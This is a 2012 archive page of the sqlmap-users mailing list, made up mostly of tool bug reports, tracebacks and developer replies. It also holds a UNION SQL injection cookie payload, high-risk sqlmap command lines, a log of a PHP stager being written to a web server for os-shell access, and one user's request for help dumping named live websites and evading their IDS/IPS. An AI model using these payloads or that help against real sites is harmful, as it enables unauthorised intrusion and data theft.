variables) > > When providing next value for --eval: > > --eval "import random;import urllib2;numRequest=random.randint(1, > 999999999);userId='sq...@wp...'+str(numRequest);headers = { > 'Accept-Language' : 'en-us,en;q=0.5 '}; req = > urllib2.Request('${SAFE_UPSELL_URL}&userId='+ userId, None, headers); > response = urllib2.urlopen(req);" > > Just want to do something like --safe-url and --safe-freq combination but > using same userId fo both related requests while using different userId for > every other pair of requests. > > Sorry I am not good at python. Am I missing anything ? Or is it a bug ? > > Thanks in advance ! > > Regards > Sergio M > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 28 > Date: Mon, 20 Aug 2012 00:11:40 +0400 > From: Happy User <rob...@gm...> > Subject: [sqlmap-users] UnicodeEncodeError: 'ascii' codec can't encode > characters in position 32-47: ordinal not in range(128) > To: sql...@li... > Message-ID: <503...@gm...> > Content-Type: text/plain; charset=ISO-8859-1; format=flowed > > Traceback (most recent call last): > File "D:\Soft\sqlmap-dev\_sqlmap.py", line 72, in main > start() > File "D:\Soft\sqlmap-dev\lib\controller\controller.py", line 355, in > start > checkNullConnection() > File "D:\Soft\sqlmap-dev\lib\controller\checks.py", line 960, in > checkNullConnection > page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD) > File "D:\Soft\sqlmap-dev\lib\request\connect.py", line 322, in getPage > conn = urllib2.urlopen(req) > File "C:\Python27\lib\urllib2.py", line 126, in urlopen > return _opener.open(url,... [truncated message content] |
|
From: Miroslav S. <mir...@gm...> - 2012-09-14 22:31:25
|
Hi.
In that case could you please send the sqlmap traffic file got by using -t
traffic.txt along with your standard switches/options?
Kind regards,
Miroslav Stampar
On Sat, Sep 15, 2012 at 12:09 AM, Stephen Shkardoon <ss...@ss...>wrote:
> Hi,
>
> Sorry, my mistake. I just copied the line and altered it to show that the
> cookie was being used. In the real script, there was no parse error.
> Nonetheless, sqlmap cannot pull out results.
>
> Thanks
> ss23
>
> On Sat, Sep 15, 2012 at 9:55 AM, Miroslav Stampar <
> mir...@gm...> wrote:
>
>> Hi.
>>
>> I am not sure how are you able to "definitely able to pull out results"
>> as as I can see the problem lies in used PHP (enclosed pair of single
>> quotes with another pair of single quotes):
>>
>> Bad:
>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>> sessionid = *'$_COOKIE['sesh']'*)");
>>
>> Good 1:
>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>> sessionid = *'$_COOKIE[sesh]'*)");
>>
>> Good 2:
>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>> sessionid = " . *$_COOKIE['sesh'] . "*)");
>>
>> With that code of yours you should get an ugly PHP error message:
>> "Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE,
>> expecting T_STRING or T_VARIABLE or T_NUM_STRING"
>>
>> Also, you could take a look at similar case here [1].
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> [1]
>> http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html
>>
>> On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon <ss...@ss...>wrote:
>>
>>> Hi all,
>>>
>>> Trying to do a (simple) injection with sqlmap, and I can't seem to coax
>>> it into getting it right.
>>> The PHP source looks something like:
>>>
>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>> sessionid = '$_COOKIE['sesh']')");
>>>
>>> and then it displays the fields it pulled out.
>>>
>>> The command(s) I've tried look something like ./sqlmap.py -u
>>> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
>>> --risk=5. However, the only injection point it finds is AND/OR time-based
>>> blind, which is horribly slow. Of course, manually, I can do a
>>> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
>>> I'm definitely able to pull out results.
>>>
>>> Anything I can do to push sqlmap in the right direction?
>>>
>>> Thanks,
>>> ss23
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Got visibility?
>>> Most devs has no idea what their production app looks like.
>>> Find out how fast your code is with AppDynamics Lite.
>>> http://ad.doubleclick.net/clk;262219671;13503038;y?
>>> http://info.appdynamics.com/FreeJavaPerformanceDownload.html
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
--
Miroslav Stampar
http://about.me/stamparm
|
|
From: Stephen S. <ss...@ss...> - 2012-09-14 22:10:02
|
Hi,
Sorry, my mistake. I just copied the line and altered it to show that the
cookie was being used. In the real script, there was no parse error.
Nonetheless, sqlmap cannot pull out results.
Thanks
ss23
On Sat, Sep 15, 2012 at 9:55 AM, Miroslav Stampar <
mir...@gm...> wrote:
> Hi.
>
> I am not sure how are you able to "definitely able to pull out results" as
> as I can see the problem lies in used PHP (enclosed pair of single quotes
> with another pair of single quotes):
>
> Bad:
> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
> sessionid = *'$_COOKIE['sesh']'*)");
>
> Good 1:
> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
> sessionid = *'$_COOKIE[sesh]'*)");
>
> Good 2:
> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
> sessionid = " . *$_COOKIE['sesh'] . "*)");
>
> With that code of yours you should get an ugly PHP error message:
> "Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE,
> expecting T_STRING or T_VARIABLE or T_NUM_STRING"
>
> Also, you could take a look at similar case here [1].
>
> Kind regards,
> Miroslav Stampar
>
> [1]
> http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html
>
> On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon <ss...@ss...>wrote:
>
>> Hi all,
>>
>> Trying to do a (simple) injection with sqlmap, and I can't seem to coax
>> it into getting it right.
>> The PHP source looks something like:
>>
>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>> sessionid = '$_COOKIE['sesh']')");
>>
>> and then it displays the fields it pulled out.
>>
>> The command(s) I've tried look something like ./sqlmap.py -u
>> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
>> --risk=5. However, the only injection point it finds is AND/OR time-based
>> blind, which is horribly slow. Of course, manually, I can do a
>> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
>> I'm definitely able to pull out results.
>>
>> Anything I can do to push sqlmap in the right direction?
>>
>> Thanks,
>> ss23
>>
>>
>> ------------------------------------------------------------------------------
>> Got visibility?
>> Most devs has no idea what their production app looks like.
>> Find out how fast your code is with AppDynamics Lite.
>> http://ad.doubleclick.net/clk;262219671;13503038;y?
>> http://info.appdynamics.com/FreeJavaPerformanceDownload.html
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
|
|
From: Miroslav S. <mir...@gm...> - 2012-09-14 21:55:21
|
Hi.
I am not sure how are you able to "definitely able to pull out results" as
as I can see the problem lies in used PHP (enclosed pair of single quotes
with another pair of single quotes):
Bad:
$res = mysql_query("SELECT userid, custname, custemail, owing FROM custdata
AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE sessionid
= *'$_COOKIE['sesh']'*)");
Good 1:
$res = mysql_query("SELECT userid, custname, custemail, owing FROM custdata
AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE sessionid
= *'$_COOKIE[sesh]'*)");
Good 2:
$res = mysql_query("SELECT userid, custname, custemail, owing FROM custdata
AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE sessionid
= " . *$_COOKIE['sesh'] . "*)");
With that code of yours you should get an ugly PHP error message:
"Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting
T_STRING or T_VARIABLE or T_NUM_STRING"
Also, you could take a look at similar case here [1].
Kind regards,
Miroslav Stampar
[1]
http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html
On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon <ss...@ss...>wrote:
> Hi all,
>
> Trying to do a (simple) injection with sqlmap, and I can't seem to coax it
> into getting it right.
> The PHP source looks something like:
>
> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
> sessionid = '$_COOKIE['sesh']')");
>
> and then it displays the fields it pulled out.
>
> The command(s) I've tried look something like ./sqlmap.py -u
> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
> --risk=5. However, the only injection point it finds is AND/OR time-based
> blind, which is horribly slow. Of course, manually, I can do a
> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
> I'm definitely able to pull out results.
>
> Anything I can do to push sqlmap in the right direction?
>
> Thanks,
> ss23
>
>
> ------------------------------------------------------------------------------
> Got visibility?
> Most devs has no idea what their production app looks like.
> Find out how fast your code is with AppDynamics Lite.
> http://ad.doubleclick.net/clk;262219671;13503038;y?
> http://info.appdynamics.com/FreeJavaPerformanceDownload.html
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
|
|
From: Stephen S. <ss...@ss...> - 2012-09-14 18:09:02
|
Hi all,
Trying to do a (simple) injection with sqlmap, and I can't seem to coax it
into getting it right.
The PHP source looks something like:
$res = mysql_query("SELECT userid, custname, custemail, owing FROM custdata
AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE sessionid
= '$_COOKIE['sesh']')");
and then it displays the fields it pulled out.
The command(s) I've tried look something like ./sqlmap.py -u
site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
--risk=5. However, the only injection point it finds is AND/OR time-based
blind, which is horribly slow. Of course, manually, I can do a
sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
I'm definitely able to pull out results.
Anything I can do to push sqlmap in the right direction?
Thanks,
ss23
|
|
From: Robin W. <ro...@di...> - 2012-09-14 14:48:26
|
On 14 September 2012 13:49, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> Original stager(.php) size is indeed 703 bytes, so sqlmap is not wrong in
> your case. You can check it by going into ./shell and running: "find
> backdoor.*_ stager.*_ -type f -exec python ../extra/cloak/cloak.py -d -i
> '{}' \;"
>
> If you want to debug you could try watching traffic with -v 5 or by
> capturing it with -t traffic.txt. Maybe something interesting could be found
> there.
I backed up my output directory then deleted and re-checked out
everything and now it is working. I guess something got cached based
on an old version of the shell.
Robin
> Kind regards,
> Miroslav Stampar
>
> On Fri, Sep 14, 2012 at 2:12 PM, Robin Wood <ro...@di...> wrote:
>>
>> Looks like you've updated the shell sent over with os-shell but not
>> updated the size that the script checks to see if it exists.
>>
>> Robin
>>
>> [13:08:22] [WARNING] unable to retrieve the web server document root
>> please provide the web server document root [/var/www/]:
>> /var/www/html/upload/
>> [13:08:29] [WARNING] unable to retrieve any web server path
>> please provide any additional web server full path to try to upload
>> the agent [Enter for None]:
>> [13:08:30] [WARNING] unable to upload the file stager on
>> '/var/www/html/upload'
>> [13:08:30] [INFO] trying to upload the file stager via UNION technique
>> do you want confirmation that the file
>> '/var/www/html/upload/tmpuivks.php' has been successfully written on
>> the back-end DBMS file system? [Y/n]
>> [13:08:33] [INFO] the file has been successfully written and its size
>> is 6969 bytes, but the size differs from the local file
>> '/tmp/tmpo2EvI1' (703 bytes)
>> [13:08:33] [WARNING] expect junk characters inside the file as a
>> leftover from UNION query
>> [13:08:33] [WARNING] HTTP error codes detected during testing:
>> 404 (Not Found) - 2 times
>> [13:08:33] [INFO] fetched data logged to text files under
>> '/home/robin/tools/web/sqlmap/output/192.168.50.22'
>>
>>
>> ------------------------------------------------------------------------------
>> Got visibility?
>> Most devs has no idea what their production app looks like.
>> Find out how fast your code is with AppDynamics Lite.
>> http://ad.doubleclick.net/clk;262219671;13503038;y?
>> http://info.appdynamics.com/FreeJavaPerformanceDownload.html
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
|
|
From: Miroslav S. <mir...@gm...> - 2012-09-14 12:50:00
|
Hi.
Original stager(.php) size is indeed 703 bytes, so sqlmap is not wrong in
your case. You can check it by going into ./shell and running: "find
backdoor.*_ stager.*_ -type f -exec python ../extra/cloak/cloak.py -d -i
'{}' \;"
If you want to debug you could try watching traffic with -v 5 or by
capturing it with -t traffic.txt. Maybe something interesting could be
found there.
Kind regards,
Miroslav Stampar
On Fri, Sep 14, 2012 at 2:12 PM, Robin Wood <ro...@di...> wrote:
> Looks like you've updated the shell sent over with os-shell but not
> updated the size that the script checks to see if it exists.
>
> Robin
>
> [13:08:22] [WARNING] unable to retrieve the web server document root
> please provide the web server document root [/var/www/]:
> /var/www/html/upload/
> [13:08:29] [WARNING] unable to retrieve any web server path
> please provide any additional web server full path to try to upload
> the agent [Enter for None]:
> [13:08:30] [WARNING] unable to upload the file stager on
> '/var/www/html/upload'
> [13:08:30] [INFO] trying to upload the file stager via UNION technique
> do you want confirmation that the file
> '/var/www/html/upload/tmpuivks.php' has been successfully written on
> the back-end DBMS file system? [Y/n]
> [13:08:33] [INFO] the file has been successfully written and its size
> is 6969 bytes, but the size differs from the local file
> '/tmp/tmpo2EvI1' (703 bytes)
> [13:08:33] [WARNING] expect junk characters inside the file as a
> leftover from UNION query
> [13:08:33] [WARNING] HTTP error codes detected during testing:
> 404 (Not Found) - 2 times
> [13:08:33] [INFO] fetched data logged to text files under
> '/home/robin/tools/web/sqlmap/output/192.168.50.22'
>
>
> ------------------------------------------------------------------------------
> Got visibility?
> Most devs has no idea what their production app looks like.
> Find out how fast your code is with AppDynamics Lite.
> http://ad.doubleclick.net/clk;262219671;13503038;y?
> http://info.appdynamics.com/FreeJavaPerformanceDownload.html
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
Miroslav Stampar
http://about.me/stamparm
|
|
From: Robin W. <ro...@di...> - 2012-09-14 12:40:27
|
Looks like you've updated the shell sent over with os-shell but not updated the size that the script checks to see if it exists. Robin [13:08:22] [WARNING] unable to retrieve the web server document root please provide the web server document root [/var/www/]: /var/www/html/upload/ [13:08:29] [WARNING] unable to retrieve any web server path please provide any additional web server full path to try to upload the agent [Enter for None]: [13:08:30] [WARNING] unable to upload the file stager on '/var/www/html/upload' [13:08:30] [INFO] trying to upload the file stager via UNION technique do you want confirmation that the file '/var/www/html/upload/tmpuivks.php' has been successfully written on the back-end DBMS file system? [Y/n] [13:08:33] [INFO] the file has been successfully written and its size is 6969 bytes, but the size differs from the local file '/tmp/tmpo2EvI1' (703 bytes) [13:08:33] [WARNING] expect junk characters inside the file as a leftover from UNION query [13:08:33] [WARNING] HTTP error codes detected during testing: 404 (Not Found) - 2 times [13:08:33] [INFO] fetched data logged to text files under '/home/robin/tools/web/sqlmap/output/192.168.50.22' |
|
From: Miroslav S. <mir...@gm...> - 2012-09-10 20:43:23
|
Hi. Find it fixed now [1]. Bye. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/issues/180 On Mon, Sep 10, 2012 at 10:30 PM, André Silva <and...@gm...> wrote: > Hi, > > After syncing the lastest sqlmap version... > > root@bt:/pentest/database/sqlmap-dev# python2.6 sqlmap.py > Traceback (most recent call last): > File "sqlmap.py", line 15, in <module> > from _sqlmap import main > File "/pentest/database/sqlmap-dev/_sqlmap.py", line 17, in <module> > from lib.controller.controller import start > File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line > 11, in <module> > from lib.controller.action import action > File "/pentest/database/sqlmap-dev/lib/controller/action.py", line 8, in > <module> > from lib.controller.handler import setHandler > File "/pentest/database/sqlmap-dev/lib/controller/handler.py", line 22, > in <module> > from plugins.dbms.mssqlserver import MSSQLServerMap > File > "/pentest/database/sqlmap-dev/plugins/dbms/mssqlserver/__init__.py", line > 11, in <module> > from plugins.dbms.mssqlserver.enumeration import Enumeration > File > "/pentest/database/sqlmap-dev/plugins/dbms/mssqlserver/enumeration.py", > line 29, in <module> > from plugins.generic.enumeration import Enumeration as > GenericEnumeration > File "/pentest/database/sqlmap-dev/plugins/generic/enumeration.py", line > 20, in <module> > from plugins.generic.entries import Entries > File "/pentest/database/sqlmap-dev/plugins/generic/entries.py", line 45, > in <module> > from lib.utils.pivotdumptable import pivotDumpTable > ImportError: No module named pivotdumptable > > > Regards > > 2012/8/31 el draco <el...@gm...> > >> [13:07:45] [CRITICAL] unhandled exception in sqlmap/1.0-dev-33980ad, >> retry your run with the latest development version from the GitHub >> repository. If the exception persists, please send by e-mail to >> 'sql...@li...' or open a new issue at >> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the >> following text and any information required to reproduce the bug. The >> developers will try to reproduce the bug, fix it accordingly and get >> back to you. >> sqlmap version: 1.0-dev-33980ad >> Python version: 2.7.3 >> Operating system: posix >> Command line: ./sqlmap.py -u >> **************************************************** -D >> *************** --dump --replicate -T ******** --start=101 --stop=500 >> Technique: UNION >> Back-end DBMS: MySQL (fingerprinted) >> Traceback (most recent call last): >> File "/home/xxx/sqlmap/sqlmap-dev/_sqlmap.py", line 72, in main >> start() >> File "/home/xxx/sqlmap/sqlmap-dev/lib/controller/controller.py", >> line 563, in start >> action() >> File "/home/xxx/sqlmap/sqlmap-dev/lib/controller/action.py", line >> 110, in action >> conf.dbmsHandler.dumpTable() >> File "/home/xxx/sqlmap/sqlmap-dev/plugins/generic/entries.py", line >> 439, in dumpTable >> conf.dumper.dbTableValues(kb.data.dumpedTable) >> File "/home/xxx/sqlmap/sqlmap-dev/lib/core/dump.py", line 392, in >> dbTableValues >> rtable = replication.createTable(table, cols) >> File "/home/xxx/sqlmap/sqlmap-dev/lib/core/replication.py", line 96, >> in createTable >> return Replication.Table(parent=self, name=tblname, >> columns=columns, typeless=typeless) >> File "/home/xxx/sqlmap/sqlmap-dev/lib/core/replication.py", line 56, >> in __init__ >> self.parent.cursor.execute('DROP TABLE IF EXISTS "%s"' % self.name) >> OperationalError: database is locked >> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > -- Miroslav Stampar http://about.me/stamparm |
|
From: André S. <and...@gm...> - 2012-09-10 20:30:09
|
Hi,
After syncing the lastest sqlmap version...
root@bt:/pentest/database/sqlmap-dev# python2.6 sqlmap.py
Traceback (most recent call last):
File "sqlmap.py", line 15, in <module>
from _sqlmap import main
File "/pentest/database/sqlmap-dev/_sqlmap.py", line 17, in <module>
from lib.controller.controller import start
File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line
11, in <module>
from lib.controller.action import action
File "/pentest/database/sqlmap-dev/lib/controller/action.py", line 8, in
<module>
from lib.controller.handler import setHandler
File "/pentest/database/sqlmap-dev/lib/controller/handler.py", line 22,
in <module>
from plugins.dbms.mssqlserver import MSSQLServerMap
File "/pentest/database/sqlmap-dev/plugins/dbms/mssqlserver/__init__.py",
line 11, in <module>
from plugins.dbms.mssqlserver.enumeration import Enumeration
File
"/pentest/database/sqlmap-dev/plugins/dbms/mssqlserver/enumeration.py",
line 29, in <module>
from plugins.generic.enumeration import Enumeration as
GenericEnumeration
File "/pentest/database/sqlmap-dev/plugins/generic/enumeration.py", line
20, in <module>
from plugins.generic.entries import Entries
File "/pentest/database/sqlmap-dev/plugins/generic/entries.py", line 45,
in <module>
from lib.utils.pivotdumptable import pivotDumpTable
ImportError: No module named pivotdumptable
Regards
2012/8/31 el draco <el...@gm...>
> [13:07:45] [CRITICAL] unhandled exception in sqlmap/1.0-dev-33980ad,
> retry your run with the latest development version from the GitHub
> repository. If the exception persists, please send by e-mail to
> 'sql...@li...' or open a new issue at
> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the
> following text and any information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get
> back to you.
> sqlmap version: 1.0-dev-33980ad
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap.py -u
> **************************************************** -D
> *************** --dump --replicate -T ******** --start=101 --stop=500
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
> File "/home/xxx/sqlmap/sqlmap-dev/_sqlmap.py", line 72, in main
> start()
> File "/home/xxx/sqlmap/sqlmap-dev/lib/controller/controller.py",
> line 563, in start
> action()
> File "/home/xxx/sqlmap/sqlmap-dev/lib/controller/action.py", line
> 110, in action
> conf.dbmsHandler.dumpTable()
> File "/home/xxx/sqlmap/sqlmap-dev/plugins/generic/entries.py", line
> 439, in dumpTable
> conf.dumper.dbTableValues(kb.data.dumpedTable)
> File "/home/xxx/sqlmap/sqlmap-dev/lib/core/dump.py", line 392, in
> dbTableValues
> rtable = replication.createTable(table, cols)
> File "/home/xxx/sqlmap/sqlmap-dev/lib/core/replication.py", line 96,
> in createTable
> return Replication.Table(parent=self, name=tblname,
> columns=columns, typeless=typeless)
> File "/home/xxx/sqlmap/sqlmap-dev/lib/core/replication.py", line 56,
> in __init__
> self.parent.cursor.execute('DROP TABLE IF EXISTS "%s"' % self.name)
> OperationalError: database is locked
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
|
|
From: Miroslav S. <mir...@gm...> - 2012-09-01 21:53:34
|
Hi. Thank you for reporting and find it fixed now [1]. KInd regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/issues/170 On Fri, Aug 31, 2012 at 6:23 PM, el draco <el...@gm...> wrote: > [13:07:45] [CRITICAL] unhandled exception in sqlmap/1.0-dev-33980ad, > retry your run with the latest development version from the GitHub > repository. If the exception persists, please send by e-mail to > 'sql...@li...' or open a new issue at > 'https://github.com/sqlmapproject/sqlmap/issues/new' with the > following text and any information required to reproduce the bug. The > developers will try to reproduce the bug, fix it accordingly and get > back to you. > sqlmap version: 1.0-dev-33980ad > Python version: 2.7.3 > Operating system: posix > Command line: ./sqlmap.py -u > **************************************************** -D > *************** --dump --replicate -T ******** --start=101 --stop=500 > Technique: UNION > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "/home/xxx/sqlmap/sqlmap-dev/_sqlmap.py", line 72, in main > start() > File "/home/xxx/sqlmap/sqlmap-dev/lib/controller/controller.py", > line 563, in start > action() > File "/home/xxx/sqlmap/sqlmap-dev/lib/controller/action.py", line > 110, in action > conf.dbmsHandler.dumpTable() > File "/home/xxx/sqlmap/sqlmap-dev/plugins/generic/entries.py", line > 439, in dumpTable > conf.dumper.dbTableValues(kb.data.dumpedTable) > File "/home/xxx/sqlmap/sqlmap-dev/lib/core/dump.py", line 392, in > dbTableValues > rtable = replication.createTable(table, cols) > File "/home/xxx/sqlmap/sqlmap-dev/lib/core/replication.py", line 96, > in createTable > return Replication.Table(parent=self, name=tblname, > columns=columns, typeless=typeless) > File "/home/xxx/sqlmap/sqlmap-dev/lib/core/replication.py", line 56, > in __init__ > self.parent.cursor.execute('DROP TABLE IF EXISTS "%s"' % self.name) > OperationalError: database is locked > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: el d. <el...@gm...> - 2012-08-31 16:24:26
|
[13:07:45] [CRITICAL] unhandled exception in sqlmap/1.0-dev-33980ad, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev-33980ad Python version: 2.7.3 Operating system: posix Command line: ./sqlmap.py -u **************************************************** -D *************** --dump --replicate -T ******** --start=101 --stop=500 Technique: UNION Back-end DBMS: MySQL (fingerprinted) Traceback (most recent call last): File "/home/xxx/sqlmap/sqlmap-dev/_sqlmap.py", line 72, in main start() File "/home/xxx/sqlmap/sqlmap-dev/lib/controller/controller.py", line 563, in start action() File "/home/xxx/sqlmap/sqlmap-dev/lib/controller/action.py", line 110, in action conf.dbmsHandler.dumpTable() File "/home/xxx/sqlmap/sqlmap-dev/plugins/generic/entries.py", line 439, in dumpTable conf.dumper.dbTableValues(kb.data.dumpedTable) File "/home/xxx/sqlmap/sqlmap-dev/lib/core/dump.py", line 392, in dbTableValues rtable = replication.createTable(table, cols) File "/home/xxx/sqlmap/sqlmap-dev/lib/core/replication.py", line 96, in createTable return Replication.Table(parent=self, name=tblname, columns=columns, typeless=typeless) File "/home/xxx/sqlmap/sqlmap-dev/lib/core/replication.py", line 56, in __init__ self.parent.cursor.execute('DROP TABLE IF EXISTS "%s"' % self.name) OperationalError: database is locked |
|
From: Miroslav S. <mir...@gm...> - 2012-08-31 08:24:03
|
Hi David. What is the content of that OUTPUT.txt? Does it have any link with GET parameters inside? Kind regards, Miroslav Stampar On Fri, Aug 31, 2012 at 8:36 AM, David London <bak...@gm...> wrote: > Commands: ./sqlmap.py -m OUPUT.txt > > results: [10:20:38] [INFO] parsing multiple targets list from 'OUTPUT.txt' > > > > [*] shutting down at 10:20:40 > > > I didn't have this problem with previous versions. > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: David L. <bak...@gm...> - 2012-08-31 06:36:18
|
Commands: ./sqlmap.py -m OUPUT.txt results: [10:20:38] [INFO] parsing multiple targets list from 'OUTPUT.txt' [*] shutting down at 10:20:40 I didn't have this problem with previous versions. |
|
From: Chris O. <chr...@gm...> - 2012-08-30 20:49:48
|
Mentioning live sites on the list... grumble... On 30 August 2012 16:06, Arturs Pavlovs <lva...@in...> wrote: > Hi! > Basically this question is about what Havij does and how to do the same w/ > SQLMap (or better). I made injections and was able to dump database with > Havij in this site - > http://nhl.id.lv/?cat=stats&position=Goalie&sort=saves through parameter > 'sort'. It used MySQL timebased injection (time is usually 4.x seconds or > 3.x - I was not able to set SQLMap to miliseconds or seconds with commas or > points) and retrieved all the needed data using slow guessing letters > method. But it did the job although it was very slow. With SQLMap it > detects MySQL timebased blind, but is not able to retrieve any data. > Payload says that there is a possibility of IDS/IPS defence. What should I > do to get the database name? Any tampering scripts or combinations of them? > Is it possible to get the names of DBs and tables faster than Havij slo-mo > guessing? > There's another site with which I have a similar problem. That's > http://hack-games.com . I set crawling to 2 and use parameters 'doaction' > or 'pmid' . SQLMap finds blind boolean injection, but once again hits the > IDS/IPS defence. Havij on the same page only without crawling (I specified > the page SQLMap found while crawling, but don't remember it :D) found the > DB, but it wasn't able to get normal characters instead of square boxes. > That is probably just an encoding issue. > Could anyone help me to sort out this situation? > > P.S. > Havij also does database name character count retrieval, before guessing > the numbers. I'm not sure if SQLMap has such function. > P.P.S. > I won't use your help to do something illegal with SQLMap, I'm just having > fun from hacking. No harm done to any of higher mentioned or any other > webpages. > > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: <du...@al...> - 2012-08-30 19:21:33
|
